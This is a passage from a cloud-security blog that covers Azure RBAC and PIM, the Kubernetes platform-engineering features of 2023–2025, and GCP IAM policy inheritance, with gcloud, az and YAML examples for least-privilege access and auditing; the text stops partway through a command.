Azure Role Definitions — Understanding Actions vs DataActions

A role definition specifies what actions it grants. Azure distinguishes two planes:

Actions: Control plane — managing the resource itself (create, delete, configure)
DataActions: Data plane — accessing data within the resource (read blob contents, get secrets)
NotActions / NotDataActions: Exceptions carved out from the grant

{
  "Name": "Storage Blob Data Reader",
  "IsCustom": false,
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action"
  ],
  "NotActions": [],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotDataActions": [],
  "AssignableScopes": ["/"]
}

The control/data plane split matters in audits. An identity with Microsoft.Storage/storageAccounts/read (an Action) can see the storage account exists and view its properties. To actually read blob contents, it needs the DataAction Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read. These are separate grants. In an access audit, checking only Actions and missing DataActions is an incomplete picture.

Built-in Roles Worth Understanding

Role	Scope	What It Grants
Owner	Any	Full access + can manage RBAC assignments — the highest trust role
Contributor	Any	Full resource management, but cannot manage RBAC
Reader	Any	Read-only on all resources
User Access Administrator	Any	Can manage RBAC assignments, no resource access
Storage Blob Data Contributor	Storage	Read/write/delete blob data
Storage Blob Data Reader	Storage	Read blob data only
Key Vault Secrets Officer	Key Vault	Manage secrets, not keys or certificates
AcrPush / AcrPull	Container Registry	Push or pull images

The gap between Owner and Contributor is important: Contributor can do everything to a resource except manage who has access to it. This is the right role for most service identities and automation — they need to manage resources, not manage permissions. If a compromised Contributor identity can’t modify RBAC assignments, it can’t grant itself or an attacker additional access.

Owner should be granted to people, not service identities, and only at the narrowest scope necessary.

Custom Roles

cat > custom-app-storage.json << 'EOF'
{
  "Name": "App Storage Blob Reader",
  "IsCustom": true,
  "Description": "Read app blobs only — no container management, no key operations",
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read"
  ],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotActions": [],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/SUB_ID"]
}
EOF

az role definition create --role-definition custom-app-storage.json

# Assign it — specifically to this storage account
az role assignment create \
  --assignee-object-id "$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "App Storage Blob Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

Role Assignments — Where Access Is Actually Granted

The assignment brings everything together: principal + role + scope. This is the actual grant.

# Assign to a user (less common — prefer group assignments)
az role assignment create \
  --assignee [email protected] \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/prodstore

# Assign to a group (better — one assignment, maintained via group membership)
GROUP_ID=$(az ad group show --group "Backend-Team" --query id -o tsv)
az role assignment create \
  --assignee-object-id "$GROUP_ID" \
  --assignee-principal-type Group \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-dev

# Assign to a managed identity
MI_PRINCIPAL=$(az identity show --name app-backend-identity --resource-group rg-identities --query principalId -o tsv)
az role assignment create \
  --assignee-object-id "$MI_PRINCIPAL" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Audit all assignments at and below a scope (including inherited)
az role assignment list \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod \
  --include-inherited \
  --output table

Group-based assignments are the right model for humans at scale. When an engineer joins the Backend team, they join the Entra ID group. Their access follows. When they leave, you remove them from the group or disable their account. You never need to hunt down individual role assignments.

Entra ID Roles — The Other Layer

Entra ID roles control the identity infrastructure itself. These are distinct from Azure RBAC roles and deserve separate treatment:

Role	What It Controls
Global Administrator	Everything in the tenant — highest privilege
Privileged Role Administrator	Assign and remove Entra ID roles
User Administrator	Create and manage users and groups
Application Administrator	Register and manage app registrations
Security Administrator	Manage security features and read reports
Security Reader	Read-only on security features

Global Administrator in Entra ID is one of the most powerful identities in a Microsoft environment. It can modify any user, any app registration, any conditional access policy. Combined with the fact that Entra ID is also the identity provider for Microsoft 365, a Global Admin compromise can extend far beyond Azure resources into email, Teams, SharePoint — the entire Microsoft 365 estate.

Nobody should hold Global Administrator as a permanent assignment. This is where Privileged Identity Management (PIM) matters.

Privileged Identity Management — Just-in-Time Elevated Access

PIM is Azure’s answer to the problem of permanent privileged role assignments. Instead of permanently holding Global Admin or Subscription Owner, users are made eligible for these roles. When they need elevated access, they activate it with a justification (and optionally an approval and MFA requirement). The access is time-limited — typically 8 hours — and automatically expires.

# List roles where the user is eligible (not permanently assigned)
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID']"

# A user activates an eligible role (calls this themselves when needed)
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant audit logs",
    "scheduleInfo": {
      "startDateTime": "2026-04-16T00:00:00Z",
      "expiration": { "type": "AfterDuration", "duration": "PT8H" }
    }
  }'

PIM is the right model for any role that could be used to escalate privileges: Global Administrator, Subscription Owner, Privileged Role Administrator, User Access Administrator. Nobody should have these permanently assigned unless there’s a strong operational reason — and even then, the assignment should be reviewed quarterly.

In one Azure environment I audited, I found 11 permanent Global Administrator assignments. The team thought this was normal because they’d all been made admins when the tenant was set up two years earlier and nobody had revisited it. Of the 11, three were former employees whose Entra ID accounts had been disabled — but the Global Admin role assignment was still there. Disabled users can’t use their accounts, but this is not a pattern you want to rely on.

Federated Identity for External Workloads

For GitHub Actions, Kubernetes workloads, and other external systems that need to call Azure APIs, federated credentials eliminate service principal secrets:

# Create an app registration
APP_ID=$(az ad app create --display-name "github-actions-deploy" --query appId -o tsv)
SP_ID=$(az ad sp create --id "$APP_ID" --query id -o tsv)

# Add a federated credential for a specific GitHub repo and branch
az ad app federated-credential create \
  --id "$APP_ID" \
  --parameters '{
    "name": "github-main-branch",
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:my-org/my-repo:ref:refs/heads/main",
    "audiences": ["api://AzureADTokenExchange"]
  }'

# Grant the service principal an RBAC role
az role assignment create \
  --assignee-object-id "$SP_ID" \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod

GitHub Actions — no secrets stored in GitHub:

jobs:
  deploy:
    permissions:
      id-token: write   # required for OIDC token request
    steps:
      - uses: azure/login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      - run: az storage blob upload --account-name prodstore ...

The client-id, tenant-id, and subscription-id values are not secrets — they’re identifiers. The actual authentication is the OIDC JWT from GitHub, verified against GitHub’s public keys, subject-matched against the configured condition (repo:my-org/my-repo:ref:refs/heads/main). If the repo or branch doesn’t match, the token exchange fails. If it matches, a short-lived Azure token is issued.

⚠ Production Gotchas

Global Admin ≠ Azure resource access
This trips up every team migrating from on-prem AD. Entra ID roles and Azure RBAC roles are independent systems. A Global Admin with no RBAC assignments cannot list VMs. Don’t assume directory privilege translates to resource access.

Permanent Global Admin assignments are a standing breach risk
In the environment I audited: 11 permanent Global Admins, three of them disabled accounts. Disabled accounts can’t authenticate, but relying on that is not a security control. PIM eligible assignments + regular access reviews is the right answer.

Owner on service identities lets compromised workloads modify RBAC
If a managed identity or service principal holds Owner, a compromised workload can grant additional permissions to itself or an attacker. Use Contributor for workloads — full resource management, no RBAC modification.

Checking only Actions misses data-plane access
An audit that enumerates role Actions and ignores DataActions will miss identities with read access to blob contents, Key Vault secrets, or database records. Both planes need to be in scope.

System-assigned identity is deleted with the resource
If you delete and recreate a VM using a system-assigned identity, the new identity is different. Any RBAC assignments made to the old identity are gone. User-assigned identities persist independently — use them for workloads where the resource lifecycle is separate from the identity lifecycle.

Quick Reference

# Audit all role assignments at a subscription (including inherited)
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table

# Find all Owner assignments at subscription scope
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --role Owner \
  --output table

# Get principal ID of a VM's managed identity
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

# View role definition — check Actions AND DataActions
az role definition list --name "Storage Blob Data Reader" --output json \
  | jq '.[0] | {Actions: .permissions[0].actions, DataActions: .permissions[0].dataActions}'

# List management group hierarchy
az account management-group list --output table

# Create user-assigned managed identity
az identity create --name app-identity --resource-group rg-identities

# Assign role to managed identity at resource scope
az role assignment create \
  --assignee-object-id "$(az identity show -n app-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/mystore

# Check PIM eligible roles for a user
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID'].{role:roleDefinitionId,scope:directoryScopeId}"

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	Azure’s directory-centric model; managed identities and PIM are the primary IAM constructs
CISSP	Domain 3 — Security Architecture	Entra ID spans Azure, M365, and third-party SaaS — scope boundaries determine the blast radius of a compromise
ISO 27001:2022	5.15 Access control	Azure RBAC role definitions and assignments implement access control policy
ISO 27001:2022	5.16 Identity management	Entra ID is the identity management platform — user lifecycle, group management, application registrations
ISO 27001:2022	8.2 Privileged access rights	PIM (Privileged Identity Management) directly implements JIT controls for privileged roles
ISO 27001:2022	5.18 Access rights	Role assignment scoping, managed identity provisioning, federated credential lifecycle
SOC 2	CC6.1	Managed identities and RBAC are the primary technical controls for CC6.1 in Azure-hosted environments
SOC 2	CC6.3	PIM activation expiry and access reviews directly satisfy time-bound access removal requirements

Key Takeaways

Entra ID and Azure RBAC are separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one, user-assigned for shared identities across multiple resources
Contributor is the right role for most service identities — full resource management without RBAC modification ability
The control/data plane split (Actions vs DataActions) in role definitions means you can grant management access without data access or vice versa — use this
PIM should govern all Entra ID privileged roles and high-scope Azure roles — nobody should permanently hold Global Admin or Subscription Owner
Federated identity credentials replace service principal secrets for external workloads — no secrets stored in CI/CD systems

What’s Next

EP07 goes cross-cloud: workload identity federation — the shift away from static credentials entirely, with IRSA for EKS, GKE Workload Identity, AKS workload identity, and GitHub Actions-to-all-three-clouds patterns.

Next: OIDC Workload Identity — Eliminate Cloud Access Keys Entirely.

Get EP07 in your inbox when it publishes → subscribe

The Platform Engineering Era: GitOps, AI Workloads, and Leaner Kubernetes (2023–2025)

May 10, 2026April 16, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

Introduction

By 2023, the question had shifted from “how do we run Kubernetes?” to “how do we let other engineers run their workloads on Kubernetes without becoming a bottleneck?”

This is the platform engineering problem. And it drove the tooling that defined 2023–2025: GitOps as the deployment standard, Cluster API for Kubernetes-on-Kubernetes provisioning, AI/ML workloads forcing new scheduling capabilities, and the Kubernetes project itself shedding more weight to become faster to release and operate.

GitOps: Principle Becomes Practice

GitOps as a term was coined by Weaveworks in 2017. By 2023, it was no longer a debate — it was the default deployment model for organizations running Kubernetes at scale.

The principle: the desired state of your cluster lives in Git. A controller watches the repository and reconciles the cluster state to match. Every deployment is a PR merge. The audit trail is the Git history.

Flux v2 (CNCF graduated) and ArgoCD (CNCF incubating) became the two dominant implementations:

# Flux: GitRepository + Kustomization
apiVersion: source.toolkit.fluxcd.io/v1
kind: GitRepository
metadata:
  name: production-config
  namespace: flux-system
spec:
  interval: 1m
  url: https://github.com/org/k8s-config
  ref:
    branch: main
---
apiVersion: kustomize.toolkit.fluxcd.io/v1
kind: Kustomization
metadata:
  name: production-apps
  namespace: flux-system
spec:
  interval: 10m
  path: ./clusters/production
  prune: true          # Remove resources deleted from Git
  sourceRef:
    kind: GitRepository
    name: production-config
  healthChecks:
  - apiVersion: apps/v1
    kind: Deployment
    name: api
    namespace: production

The prune: true behavior is critical: resources deleted from Git are deleted from the cluster. This is what makes GitOps a security control — unknown resources that aren’t in Git get removed. No more accumulation of forgotten test deployments, rogue debug pods, or unauthorized configuration changes that outlive the engineer who made them.

ArgoCD’s Application model added a UI, synchronization policies, and multi-cluster management:

apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: production-api
  namespace: argocd
spec:
  project: production
  source:
    repoURL: https://github.com/org/apps
    targetRevision: HEAD
    path: api/production
  destination:
    server: https://kubernetes.default.svc
    namespace: api
  syncPolicy:
    automated:
      prune: true
      selfHeal: true    # Revert manual kubectl changes
    syncOptions:
    - CreateNamespace=true

The selfHeal: true option is where GitOps becomes enforceable: any manual change made with kubectl is automatically reverted within the sync interval. For compliance-sensitive environments, this is a configuration drift prevention control.

Cluster API: Kubernetes Managing Kubernetes

Cluster API (cluster-sigs/cluster-api) flipped the usual model: instead of using tools like Terraform or Ansible to provision Kubernetes clusters, Cluster API lets you manage Kubernetes clusters as Kubernetes resources — using a management cluster to provision and manage workload clusters.

# Create a new Kubernetes cluster as a Kubernetes resource
apiVersion: cluster.x-k8s.io/v1beta1
kind: Cluster
metadata:
  name: workload-cluster-prod
spec:
  clusterNetwork:
    pods:
      cidrBlocks: ["192.168.0.0/16"]
  infrastructureRef:
    apiVersion: infrastructure.cluster.x-k8s.io/v1beta2
    kind: AWSCluster
    name: workload-cluster-prod
  controlPlaneRef:
    apiVersion: controlplane.cluster.x-k8s.io/v1beta1
    kind: KubeadmControlPlane
    name: workload-cluster-prod-control-plane

Cluster API reconciliation handles cluster provisioning, scaling, upgrades, and deletion — all through the Kubernetes API, with all the tooling (RBAC, audit logging, GitOps integration) that entails. Multi-cluster platform teams could now manage hundreds of workload clusters from a single management cluster.

Kubernetes 1.28 — Sidecar Containers Alpha (August 2023)

Sidecar containers had been a Kubernetes pattern since 2015 — a helper container in the same pod as the main application. But there was no native sidecar lifecycle management. Sidecars were just regular init containers or additional containers, which meant:
– Init container sidecars ran before the application and had to block until they succeeded
– Regular container sidecars had no ordering guarantees at startup
– At pod termination, sidecars could die before the application finished draining

1.28 introduced native sidecar support: a new restartPolicy field for init containers:

spec:
  initContainers:
  - name: log-collector
    image: fluentbit:latest
    restartPolicy: Always    # This makes it a sidecar
    # Starts before main containers, stays running, stops after main containers exit
  containers:
  - name: application
    image: myapp:latest

A sidecar container (init container with restartPolicy: Always):
– Starts before application containers
– Stays running throughout the pod lifecycle
– Terminates automatically after all main containers exit
– Restarts if it crashes (unlike regular init containers)

This solved the service mesh sidecar problem: Istio and Linkerd injected Envoy proxies as regular containers, leading to race conditions where the proxy hadn’t started when the application tried to make outbound connections. Native sidecar lifecycle guarantees the proxy is ready before the application starts.

Also in 1.28:
– Retroactive default StorageClass assignment: Existing PVCs without a StorageClass assignment get the default applied retroactively — useful for migrations
– Non-graceful node shutdown stable: Handle node power failures without manual pod cleanup
– Recovery from volume expansion failure: Previously, a failed volume expansion left the PVC in a broken state; 1.28 introduced a mechanism to recover

AI/ML Workloads Force New Kubernetes Capabilities

The LLM wave of 2023 drove GPU workloads onto Kubernetes at a scale and urgency the project hadn’t anticipated. Running LLM inference on Kubernetes required solving problems that CPU-centric cluster scheduling hadn’t encountered:

GPU topology awareness: Inference across multiple GPUs requires GPUs connected by NVLink or on the same PCIe switch, not arbitrary GPUs from different nodes or different PCIe buses. The Dynamic Resource Allocation API (1.26 alpha) was designed exactly for this.

Fractional GPU allocation: NVIDIA’s time-slicing and MIG (Multi-Instance GPU) allow multiple pods to share a single GPU. The GPU operator (NVIDIA) manages this at the node level:

# Check GPU resources visible to Kubernetes
kubectl get nodes -o custom-columns=\
  "NODE:.metadata.name,GPU:.status.allocatable.nvidia\.com/gpu"
# NODE       GPU
# gpu-node-1   8
# gpu-node-2   8

Batch scheduling for training jobs: Training runs require all workers to start simultaneously — a single missing GPU makes the entire job stall. The Kubernetes Job API doesn’t guarantee this. Projects like Volcano (CNCF incubating) and Kueue (Kubernetes SIG Scheduling) added gang scheduling: a job only starts when all requested resources are available.

# Kueue: queue AI training jobs with resource quotas
apiVersion: kueue.x-k8s.io/v1beta1
kind: ClusterQueue
metadata:
  name: gpu-queue
spec:
  namespaceSelector: {}
  resourceGroups:
  - coveredResources: ["nvidia.com/gpu", "cpu", "memory"]
    flavors:
    - name: a100-80gb
      resources:
      - name: nvidia.com/gpu
        nominalQuota: 16

Kubernetes 1.29 — Sidecar to Beta, Load Balancer IP Mode (December 2023)

Sidecar containers beta: The lifecycle semantics were refined based on 1.28 alpha feedback
Load balancer IP mode alpha: Distinguish between load balancers that use virtual IPs (kube-proxy handles the traffic) vs. those that handle traffic directly (no need for kube-proxy rules) — important for eBPF-based load balancers
ReadWriteOncePod volume access stable

Kubernetes 1.30 — Structured Authorization Config (April 2024)

Structured authorization configuration beta: Define multiple authorization webhooks with explicit ordering, failure modes, and connection settings — replacing the flat --authorization-mode flag
Sidecar containers beta continues
Node memory swap support beta: Allow pods to use swap memory — controversial but necessary for workloads with bursty memory patterns that prefer using swap over OOM kill

# Node with swap enabled — kubelet config
kind: KubeletConfiguration
memorySwap:
  swapBehavior: LimitedSwap

The swap support feature reversed a long-standing Kubernetes hard stance: swap was disabled since 1.0 because its interaction with Kubernetes memory accounting was unpredictable. The 1.30 approach adds proper accounting and policies.

Kubernetes 1.31 — Cloud Provider Code Removal Complete (August 2024)

1.31 marked the completion of the cloud provider code removal — the 1.5 million line migration that had been running since 1.26. Core binaries are 40% smaller. The API server, controller manager, and scheduler no longer contain vendor-specific code.

Also in 1.31:
– Persistent Volume health monitor stable
– AppArmor support stable: AppArmor profiles for pods using the native Kubernetes field (not annotations)
– Traffic distribution for Services beta: Express topology preferences for Service routing (prefer local node, prefer same zone)

# Traffic distribution: prefer endpoints in the same zone
apiVersion: v1
kind: Service
metadata:
  name: api
spec:
  trafficDistribution: PreferClose
  selector:
    app: api
  ports:
  - port: 80
    targetPort: 8080

Kubernetes 1.32 — Sidecar Stable, DRA Beta (December 2024)

Sidecar containers stable: After nearly a decade of workarounds, the sidecar pattern is a first-class Kubernetes primitive
Dynamic Resource Allocation beta: GPU and specialized hardware scheduling ready for production evaluation
Job API improvements: Success and failure policies for indexed jobs — granular control over batch workload behavior
Custom Resource field selectors: Filter CRDs on arbitrary fields — making large CRD-based systems more efficient to query

Crossplane: Kubernetes as the Control Plane for Everything

Crossplane (CNCF graduated) extended the Kubernetes API model beyond the cluster itself. Using CRDs and controllers, Crossplane lets you manage cloud resources (RDS databases, S3 buckets, VPCs, IAM roles) as Kubernetes resources — provisioned, updated, and deleted through the Kubernetes API.

# Crossplane: provision an RDS PostgreSQL instance as a Kubernetes resource
apiVersion: database.aws.crossplane.io/v1beta1
kind: RDSInstance
metadata:
  name: production-db
spec:
  forProvider:
    region: us-east-1
    dbInstanceClass: db.r6g.xlarge
    masterUsername: admin
    engine: postgres
    engineVersion: "15"
    allocatedStorage: 100
    multiAZ: true
  writeConnectionSecretsToRef:
    name: production-db-credentials
    namespace: production

For platform teams, Crossplane means a single control plane — the Kubernetes API — for both compute workloads and cloud infrastructure. GitOps tools (Flux, ArgoCD) manage both.

Key Takeaways

GitOps (Flux, ArgoCD) became the production deployment standard — not for ideological reasons, but because the audit trail, drift detection, and self-healing properties solve real operational and compliance problems
Cluster API made Kubernetes cluster lifecycle (provisioning, upgrades, deletion) a Kubernetes-native operation — the same API, tooling, and audit trail
Native sidecar containers (1.28 alpha → 1.32 stable) finally resolved the lifecycle ordering problem that service meshes and log collectors had worked around for years
AI/ML workloads drove new scheduling capabilities (DRA, gang scheduling via Kueue/Volcano) and made GPU topology awareness a first-class concern
Crossplane generalized the Kubernetes API model to cloud infrastructure — the cluster is now a control plane for everything, not just containers

What’s Next

← EP06: The Runtime Reckoning | EP08: Kubernetes Today →

Series: Kubernetes: From Borg to Platform Engineering | linuxcent.com

GCP IAM Policy Inheritance: How the Resource Hierarchy Controls Access

May 10, 2026April 15, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes

TL;DR

GCP IAM bindings inherit downward — a binding at Organization or Folder level applies to every project and resource beneath it
Basic roles (viewer/editor/owner) are legacy constructs; use predefined or custom roles in production
Service account keys are a long-lived credential antipattern — use ADC, impersonation, or Workload Identity Federation instead
allAuthenticatedUsers bindings expose resources to any of 3 billion Google accounts — audit for these in every environment
iam.serviceAccounts.actAs is the GCP equivalent of AWS iam:PassRole — a direct privilege escalation vector
Conditional bindings with time-bound expiry eliminate “I’ll remember to remove this” as an operational pattern

The Big Picture

                GCP IAM Inheritance Model
─────────────────────────────────────────────────────────
Organization (company.com)
│
├─ IAM binding at Org level ──────────────────┐
│                                             │ inherits down
├── Folder: Production                        ▼
│   │                                 ALL nodes below
│   ├── Folder: Shared-Services
│   │       └── Project: infra-core
│   │               ├── GCS: config-bucket  ← affected
│   │               └── Secret Manager      ← affected
│   │
│   └── Project: prod-web-app
│           ├── GCS: prod-assets             ← affected
│           ├── Cloud SQL: prod-db           ← affected
│           └── BigQuery: analytics          ← affected
│
└── Folder: Development                      ← NOT affected by
        └── Project: dev-app                    Production binding

GCP resource hierarchy IAM inheritance is the mechanism that makes a single binding cascade through an entire estate. It’s also the reason high-level bindings carry far more blast radius than they appear to.

Introduction

GCP resource hierarchy IAM operates on one rule: bindings propagate downward. Grant access at the Organization level and it applies to every Folder, every Project, and every resource in your GCP estate. Grant it at a Folder and it applies to every Project below. This is by design — and it’s the reason IAM misconfigurations in GCP can have a blast radius that teams migrating from AWS don’t anticipate.

I once inherited a GCP environment where the previous team had taken what they thought was a shortcut. They had a folder called Production with twelve projects in it. Rather than grant developers access to each project individually, they bound roles/editor at the folder level. One binding, twelve projects, all covered. Fast.

When I audited what roles/editor on that folder actually meant, I found it gave every developer in that binding write access to Cloud SQL databases they’d never heard of, BigQuery datasets from other teams, Pub/Sub topics in shared services, and Cloud Storage buckets that held data exports. Not because anyone intended that. Because permissions in GCP flow downward through the hierarchy, and a broad role at a high level means a broad role everywhere below it.

The developer who made that binding understood “Editor means edit access.” They didn’t think through what “edit access at the folder level” means across twelve projects. This is the GCP IAM trap that catches teams coming from AWS: the hierarchy feels like an organizational convenience feature, not an access control mechanism. It’s both.

The Resource Hierarchy — Not Just Org Structure

GCP’s resource hierarchy is the backbone of its IAM model:

Organization  (e.g., company.com)
  └── Folder  (e.g., Production, Development, Shared-Services)
        └── Folder  (nested, optional — up to 10 levels)
              └── Project  (unit of resource ownership and billing)
                    └── Resource  (GCE instance, GCS bucket, Cloud SQL, BigQuery, etc.)

The critical rule: IAM bindings at any level inherit downward to every node below.

Org IAM binding:
  [email protected] → roles/viewer (org-level)
    ↓ inherited by
  Folder: Production
    ↓ inherited by
  Project: prod-web-app
    ↓ inherited by
  GCS bucket "prod-assets"

Result: alice can list and read resources across the ENTIRE org,
        across every folder, every project, every resource.
        Even if none of those resources have a direct binding for alice.

roles/viewer at the org level sounds benign — it’s just read access. But read access to everything in the organization, including infrastructure configurations, customer data exports in GCS, BigQuery analytics, Cloud SQL connection details, and Kubernetes cluster configs. Not benign.

Before making any binding above the project level, trace it down. Ask: what does this role grant, and at every project and resource below this folder, am I comfortable with that?

# Understand your org structure before making changes
gcloud organizations list

gcloud resource-manager folders list --organization=ORG_ID

gcloud projects list --filter="parent.id=FOLDER_ID"

# See all existing bindings at the org level — do this regularly
gcloud organizations get-iam-policy ORG_ID --format=json | jq '.bindings[]'

Member Types — Who Can Hold a Binding

GCP uses the term member (being renamed to principal) for the identity in a binding:

Member Type	Format	Notes
Google Account	`user:[email protected]`	Individual Google/Workspace account
Service Account	`serviceAccount:[email protected]`	Machine identity
Google Group	`group:[email protected]`	Workspace group
Workspace Domain	`domain:company.com`	All users in a Workspace domain
All Authenticated	`allAuthenticatedUsers`	Any authenticated Google identity — extremely broad
All Users	`allUsers`	Anonymous + authenticated — public access
Workload Identity	`principal://iam.googleapis.com/...`	External workloads via WIF

The ones that have caused data exposure incidents: allAuthenticatedUsers and allUsers. Any GCS bucket or GCP resource bound to allAuthenticatedUsers is accessible to any of the ~3 billion Google accounts in existence. I have seen production customer data exposed this way. A developer testing a public CDN pattern applied the binding to the wrong bucket.

Audit for these regularly:

# Find any project-level binding with allUsers or allAuthenticatedUsers
gcloud projects get-iam-policy my-project --format=json \
  | jq '.bindings[] | select(.members[] | contains("allUsers") or contains("allAuthenticatedUsers"))'

# Check all GCS buckets in a project for public access
gsutil iam get gs://BUCKET_NAME \
  | grep -E "(allUsers|allAuthenticatedUsers)"

Role Types — Choose the Right Granularity

Basic (Primitive) Roles — Don’t Use in Production

roles/viewer   → read access to most resources across the entire project
roles/editor   → read + write to most resources
roles/owner    → full access including IAM management

These are legacy roles from before GCP had service-specific roles. roles/editor is particularly dangerous because it grants write access across almost every GCP service in the project. Use it in production and you have no meaningful separation of duties between your services.

I’ve seen roles/editor granted to a data pipeline service account because “it needed access to BigQuery, Cloud Storage, and Pub/Sub.” All three of those have predefined roles. Three specific bindings. Instead: one broad role that also grants access to Cloud SQL, Kubernetes, Secret Manager, and Compute Engine — none of which the pipeline needed.

Predefined Roles — The Default Correct Choice

Service-specific roles managed and updated by Google. For most use cases, these are the right choice:

# Find predefined roles for Cloud Storage
gcloud iam roles list --filter="name:roles/storage" --format="table(name,title)"
# roles/storage.objectViewer   — read objects (not list buckets)
# roles/storage.objectCreator  — create objects, cannot read or delete
# roles/storage.objectAdmin    — full object control
# roles/storage.admin          — full bucket + object control (much broader)

# See exactly what permissions a predefined role includes
gcloud iam roles describe roles/storage.objectViewer

The distinction between roles/storage.objectViewer and roles/storage.admin is the difference between “can read objects” and “can read objects, create objects, delete objects, and modify bucket IAM policies.” Use the narrowest role that covers the actual need.

Custom Roles — When Predefined Is Still Too Broad

When you need finer control than any predefined role offers, create a custom role:

cat > custom-log-reader.yaml << 'EOF'
title: "Log Reader"
description: "Read application logs from Cloud Logging — nothing else"
stage: "GA"
includedPermissions:
  - logging.logEntries.list
  - logging.logs.list
  - logging.logMetrics.get
  - logging.logMetrics.list
EOF

# Create at project level (available within one project)
gcloud iam roles create LogReader \
  --project=my-project \
  --file=custom-log-reader.yaml

# Or at org level (reusable across projects in the org)
gcloud iam roles create LogReader \
  --organization=ORG_ID \
  --file=custom-log-reader.yaml

# Grant the custom role
gcloud projects add-iam-policy-binding my-project \
  --member="serviceAccount:[email protected]" \
  --role="projects/my-project/roles/LogReader"

Custom roles have an operational overhead: when Google adds new permissions to a service, predefined roles are updated automatically. Custom roles are not — you have to update them manually. For roles like “Log Reader” that are unlikely to need new permissions, this isn’t a concern. For roles like “App Admin” that span many services, it becomes a maintenance burden.

IAM Policy Bindings — How Access Is Actually Granted

The mechanism for granting access in GCP is adding a binding to a resource’s IAM policy. A binding is: member + role + (optional condition).

# Grant a role on a project (all resources in the project inherit this)
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/storage.objectViewer"

# Grant on a specific GCS bucket (narrower — only this bucket)
gcloud storage buckets add-iam-policy-binding gs://prod-assets \
  --member="serviceAccount:[email protected]" \
  --role="roles/storage.objectViewer"

# Grant on a specific BigQuery dataset
bq update --add_iam_policy_binding \
  --member="group:[email protected]" \
  --role="roles/bigquery.dataViewer" \
  my-project:analytics_dataset

# View the current IAM policy on a project
gcloud projects get-iam-policy my-project --format=json

# View a specific resource's policy
gcloud storage buckets get-iam-policy gs://prod-assets

The choice between project-level and resource-level binding has real consequences. A binding on the GCS bucket affects only that bucket. A binding at the project level affects the bucket AND every other resource in the project. In practice, default to the most specific scope available. Only move up the hierarchy when the alternative is an unmanageable number of bindings.

Conditional Bindings — Time-Limited and Context-Scoped Access

Conditions scope when a binding applies. They use CEL (Common Expression Language):

# Temporary access for a contractor — automatically expires
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/storage.objectViewer" \
  --condition="expression=request.time < timestamp('2026-06-30T00:00:00Z'),title=Contractor access Q2 2026"

# Access only from corporate network
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.origin.ip.startsWith('10.0.'),title=Corp network only"

Temporary access that automatically expires is one of the most practical applications of conditional bindings. Instead of “I’ll grant access and remember to remove it,” you set an expiry and it removes itself. The cognitive overhead of tracking temporary grants doesn’t disappear — you still need to know the grant exists — but the risk of it outliving its purpose drops significantly.

Service Accounts — GCP’s Machine Identity

Service accounts are the machine identity in GCP. They should be used for every workload that needs to call GCP APIs — GCE instances, GKE pods, Cloud Functions, Cloud Run services.

# Create a service account
gcloud iam service-accounts create app-backend \
  --display-name="App Backend Service Account" \
  --project=my-project

SA_EMAIL="[email protected]"

# Grant it the specific role it needs — on the specific resource it needs
gcloud storage buckets add-iam-policy-binding gs://app-assets \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Attach to a GCE instance
gcloud compute instances create my-vm \
  --service-account="${SA_EMAIL}" \
